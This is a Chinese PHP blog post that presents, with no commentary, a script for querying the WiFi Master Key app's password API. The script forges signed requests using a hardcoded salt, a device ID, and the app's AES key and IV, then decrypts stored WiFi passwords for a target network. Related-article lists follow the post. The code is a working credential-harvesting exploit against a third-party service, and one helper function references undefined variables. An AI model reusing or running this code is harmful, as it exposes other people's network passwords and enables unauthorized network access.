编程 PHP

WIFI万能钥匙密码查询接口实例

Posted in PHP onSeptember 28, 2015

不废话了，直接给大家贴代码了

<?php //some code from http://www.wooyun.org/bugs/wooyun-2015-099268
$bssid = "c8:3a:35:fa:b8:80" ;
$ssid = "Podinns2F03" ;
if (isset( $bssid ) && isset( $ssid )){
//update salt
   $ret = request( $bssid , $ssid , md5(rand(1, 10000)));
   $ret = json_decode( $ret );
   $ret = request( $bssid , $ssid , $ret ->retSn);
   $ret = json_decode( $ret );
   if ( $ret ->retCd == 0){
     if ( $ret ->qryapwd->retCd == 0){
       $list = $ret ->qryapwd->psws;
       foreach ( $list as $wifi ){
         echo 'SSID: ' . $wifi ->ssid. "\n" ;
         echo 'PWD: ' .decryptStrin( $wifi ->pwd). "\n" ;
         echo 'BSSID: ' . $wifi ->bssid. "\n" ;
         if ( $wifi ->xUser){
           echo 'xUser: ' . $wifi ->xUser. "\n" ;
           echo 'xPwd: ' . $wifi ->xPwd. "\n" ;
         }
       }
     }
     else {
       echo $ret ->qryapwd->retMsg;
     }
   }
}
function request( $bssid , $ssid , $salt , $dhid = 'ff8080814cc5798a014ccbbdfa375369' ){
   $data = array ();
   $data [ 'appid' ] = '0008' ;
   $data [ 'bssid' ] = $bssid ;
   $data [ 'chanid' ] = 'gw' ;
   $data [ 'dhid' ] = $dhid ;
   $data [ 'ii' ] = '609537f302fc6c32907a935fb4bf7ac9' ;
   $data [ 'lang' ] = 'cn' ;
   $data [ 'mac' ] = '60f81dad28de' ;
   $data [ 'method' ] = 'getDeepSecChkSwitch' ;
   $data [ 'pid' ] = 'qryapwd:commonswitch' ;
   $data [ 'ssid' ] = $ssid ;
   $data [ 'st' ] = 'm' ;
   $data [ 'uhid' ] = 'a0000000000000000000000000000001' ;
   $data [ 'v' ] = '324' ;
   $data [ 'sign' ] = sign( $data , $salt );
   $curl = curl_init();
   curl_setopt( $curl , CURLOPT_URL, 'http://wifiapi02.51y5.net/wifiapi/fa.cmd' );
   curl_setopt( $curl , CURLOPT_USERAGENT, 'WiFiMasterKey/1.1.0 (Mac OS X Version 10.10.3 (Build 14D136))' );
   curl_setopt( $curl , CURLOPT_SSL_VERIFYPEER, false); // stop verifying certificate
   curl_setopt( $curl , CURLOPT_RETURNTRANSFER, true);
   curl_setopt( $curl , CURLOPT_POST, true); // enable posting
   curl_setopt( $curl , CURLOPT_POSTFIELDS, http_build_query( $data )); // post images
   curl_setopt( $curl , CURLOPT_FOLLOWLOCATION, true); // if any redirection after upload
   $r = curl_exec( $curl );
   curl_close( $curl );
   return $r ;
}
function registerNewDevice(){
   $salt = '1Hf%5Yh&7Og$1Wh!6Vr&7Rs!3Nj#1Aa$' ;
   $data = array ();
   $data [ 'appid' ] = '0008' ;
   $data [ 'bssid' ] = $bssid ;
   $data [ 'chanid' ] = 'gw' ;
   $data [ 'dhid' ] = $dhid ;
   $data [ 'ii' ] = '609537f302fc6c32907a935fb4bf7ac9' ;
   $data [ 'lang' ] = 'cn' ;
   $data [ 'mac' ] = '60f81dad28de' ;
   $data [ 'method' ] = 'getDeepSecChkSwitch' ;
   $data [ 'pid' ] = 'qryapwd:commonswitch' ;
   $data [ 'ssid' ] = $ssid ;
   $data [ 'st' ] = 'm' ;
   $data [ 'uhid' ] = 'a0000000000000000000000000000001' ;
   $data [ 'v' ] = '324' ;
   $data [ 'sign' ] = sign( $data , $salt );
}
function sign( $array , $salt ){
   // 签名算法
   $request_str = '' ;
   // 对应apk中的 Arrays.sort 数组排序，测试PHP需用 ksort
   ksort( $array );
   foreach ( $array as $key => $value ) {
     $request_str .= $value ;
   }
   $sign = md5( $request_str . $salt );
   return strtoupper ( $sign );
}
function decryptStrin( $str , $keys = 'k%7Ve#8Ie!5Fb&8E' , $iv = 'y!0Oe#2Wj#6Pw!3V' , $cipher_alg =MCRYPT_RIJNDAEL_128){
   //Wi-Fi万能钥匙密码采用 AES/CBC/NoPadding 方式加密
   //[length][password][timestamp]
   $decrypted_string = mcrypt_decrypt( $cipher_alg , $keys , pack( "H*" , $str ),MCRYPT_MODE_CBC, $iv );
   return substr (trim( $decrypted_string ),3,-13);
} ?>

以上代码很简单吗，WIFI万能钥匙密码查询接口代码就全部写完了，希望大家喜欢。

WIFI万能钥匙密码查询接口实例

- Author -

mrr

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

PHP 相关文章推荐

杏林同学录(九)

Oct 09 PHP

在PHP中使用模板的方法

May 24 PHP

PHP写入WRITE编码为UTF8的文件的实现代码

Jul 07 PHP

header中Content-Disposition的作用与使用方法

Jun 13 PHP

WordPress主题制作中自定义头部的相关PHP函数解析

Jan 08 PHP

PHP Header失效的原因分析及解决方法

Nov 16 PHP

php批量删除操作代码分享

Feb 26 PHP

微信公众平台开发-微信服务器IP接口实例（含源码）

Mar 05 PHP

PHP面向对象之事务脚本模式(详解)

Jun 07 PHP

深入理解Yii2.0乐观锁与悲观锁的原理与使用

Jul 26 PHP

php关联数组与索引数组及其显示方法

Mar 12 PHP

PHP面向对象五大原则之开放-封闭原则(OCP)详解

Apr 04 PHP

百万级别知乎用户数据抓取与分析之PHP开发

Sep 28 #PHP

培养自己的php编码规范

Sep 28 #PHP

ThinkPHP数据操作方法总结

Sep 28 #PHP

ThinkPHP表单数据智能写入create方法实例分析

Sep 27 #PHP

PHP+MySQL之Insert Into数据插入用法分析

Sep 27 #PHP

ThinkPHP中数据操作案例分析

Sep 27 #PHP

PHP中两个float(浮点数)比较实例分析

Sep 27 #PHP

You might like

php park、unpark、ord 函数使用方法（二进制流接口应用实例）

2010/10/19 PHP

探讨:如何使用PHP实现计算两个日期间隔的年、月、周、日数

2013/06/13 PHP

php禁止某ip或ip地址段访问的方法

2015/02/25 PHP

得到文本框选中的文字，动态插入文字的js代码

2007/03/07 Javascript

js 实现 input type="file" 文件上传示例代码

2013/08/07 Javascript

Jquery中国地图热点效果-鼠标经过弹出提示层信息的简单实例

2014/02/12 Javascript

js获取当前地址 JS获取当前URL的示例代码

2014/02/26 Javascript

jquery获取及设置outerhtml的方法

2015/03/09 Javascript

举例说明如何为JavaScript的方法参数设置默认值

2015/11/17 Javascript

Javascript简写条件语句(推荐)

2016/06/12 Javascript

Vuex2.0+Vue2.0构建备忘录应用实践

2016/11/30 Javascript

利用JavaScript如何查询某个值是否数组内

2017/07/30 Javascript

vue 2.0 购物车小球抛物线的示例代码

2018/02/01 Javascript

详解vue-cli中使用rem,vue自适应

2019/05/06 Javascript

微信小程序动画组件使用解析，类似vue，且更强大

2019/08/01 Javascript

微信小程序数据缓存实现方法详解

2019/08/26 Javascript

Map与WeakMap类型在JavaScript中的使用详解

2020/11/18 Javascript

合并Excel工作薄中成绩表的VBA代码，非常适合教育一线的朋友

2009/04/09 Python

在Python中移动目录结构的方法

2016/01/31 Python

Python 2与Python 3版本和编码的对比

2017/02/14 Python

Python 25行代码实现的RSA算法详解

2018/04/10 Python

python输出决策树图形的例子

2019/08/09 Python

Python类的绑定方法和非绑定方法实例解析

2020/03/04 Python

Python 读取xml数据,cv2裁剪图片实例

2020/03/10 Python

Keras在训练期间可视化训练误差和测试误差实例

2020/06/16 Python

html5读取本地文件示例代码

2014/04/22 HTML / CSS

html5使用canvas实现弹幕功能示例

2017/09/11 HTML / CSS

伊芙丽官方旗舰店：中国淑女一线品牌

2017/12/01 全球购物

英国二手iPhone、音乐、电影和游戏商店：musicMagpie

2018/10/26 全球购物

Laura Geller官网：美国彩妆品牌

2018/12/29 全球购物

四年级下册教学反思

2014/02/01 职场文书

父亲的菜园教学反思

2014/02/13 职场文书

学校门卫岗位职责

2014/03/16 职场文书

学习优秀党员杨宗兴先进事迹材料思想汇报

2014/09/14 职场文书

水利专业大学生职业生涯规划书范文

2014/09/17 职场文书

学校党委干部个人对照检查材料思想汇报

2014/10/09 职场文书